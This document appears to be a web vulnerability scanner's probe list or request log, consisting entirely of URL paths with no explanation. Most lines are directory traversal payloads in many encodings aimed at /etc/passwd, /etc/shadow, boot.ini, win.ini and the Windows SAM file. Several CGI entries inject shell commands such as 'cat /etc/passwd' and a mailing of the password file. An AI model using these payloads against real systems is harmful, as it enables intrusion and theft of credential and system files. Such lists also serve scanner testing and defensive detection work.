/web/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini/
/web/%a%s%p%d/
/web/%00/,/web/%NETHOOD%//
/web/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/,/web/%2f//,/web/%2e//,/web/%00//,/web/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd/
/web/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini/,/web/................../config.sys/,/web/../../../../../../boot.ini/
/web/../../shadow/
/web/../../passwd/
/web/../../etc/passwd/
/web/../../boot.ini/
/web/../../../scandisk.log/
/web/../../../etc/passwd/
/web/../../../boot.ini/
/web/../../../autoexec.bat/
/web/../../../../winnt/repair/sam._/
/web/../../../../etc/passwd/
/web/../../../../etc/hosts/
/web/../../../../config.sys/
/web/../../../../boot.ini/
/web/../../../../../winnt/repair/sam._/
/web/../../../../../etc/passwd/
/web/../../../../../../Scandisk.log/
/web/../../../../../boot.ini/
/web/../../../../../../../boot.ini/
/web/../../../../../../../../boot.ini/
/web/../../../../../../../../../boot.ini/
/web/../../../../../../../../../../etc/passwd/
/web/../../../../../../../../../../etc/passw*/
/web/../../../../../../../../../../etc/*/
/web/../../../../%20all/
/web/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam/,/web/............./boot.ini/,/web/..../boot.ini/,/web/../../windows/user.dat/
/web/../../../..//,/web/.../boot.ini/,/web/....../autoexec.bat/,/web/../webserver.ini/,/web/../../winnt/win.ini/
/web/a.asp/..%%35c../..%%35c../winnt/win.ini/
/web/a.asp/..%%35c../..%%35c..\winnt\repair\sam._/
/web/a.asp/..%%35%63../..%%35%63..\winnt\repair\sam._/
/web/a.asp/.%u002e/.%u002e/.%u002e/.%u002e/winnt/win.ini/
/web/a.asp/..%%35%63../..%%35%63../winnt/win.ini/
/web/a.asp/..%u005c../..%u005c../winnt/win.ini/
/web/a.asp/..%u00255c../..%u00255c..\winnt\repair\sam._/
/web/a.asp/..%u002f../..%u002f..\winnt\repair\sam._/
/web/a.asp/..%u00255c../..%u00255c../winnt/win.ini/
/web/cgi-bin/.htaccess~/,/web/cgi-bin/CSMailto.cgi/,/web/cgi-bin/FileSeek2.cgi?head=&foot=;cat%20/etc/passwd/,/web/cgi-bin/FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com/,/web/cgi-bin/GWWEB.EXE/,/web/cgi-bin/SGB_DIR/superguestconfig/,/web/cgi-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd/,/web/cgi-bin/adduser.cgi/,/web/cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd/,/web/cgi-bin/allmanage.pl/,/web/cgi-bin/architext_query.pl/,/web/cgi-bin/awstats.pl/,/web/cgi-bin/bb-ack.sh/,/web/cgi-bin/blog/mt.cfg/,/web/cgi-bin/c32web.exe/ChangeAdminPassword/,/web/cgi-bin/calendar/calendar_admin.pl?config=|cat%20/etc/passwd|/,/web/cgi-bin/cart.pl/,/web/cgi-bin/cgicso?query=AAA/,/web/cgi-bin/cgitest.exe/,/web/cgi-bin/clickcount.pl?view=test/,/web/cgi-bin/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd/,/web/cgi-bin/csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')/,/web/cgi-bin/cstat.pl/,/web/cgi-bin/dbman/db.cgi?db=no-db/,/web/cgi-bin/dig.cgi/,/web/cgi-bin/dose.pl/,/web/cgi-bin/enter.cgi/,/web/cgi-bin/ezboard.cgi/,/web/cgi-bin/filemail/,/web/cgi-bin/formmail.cgi/,/web/cgi-bin/fpexplore.exe/,/web/cgi-bin/gbook/gbook.cgi/,/web/cgi-bin/gm.cgi/,/web/cgi-bin/horde/test.php/,/web/cgi-bin/html2chtml.cgi/,/web/cgi-bin/if/admin/nph-build.cgi/,/web/cgi-bin/info2www%20'(../../../../../../../bin/mail%20root%20</etc/passwd>/
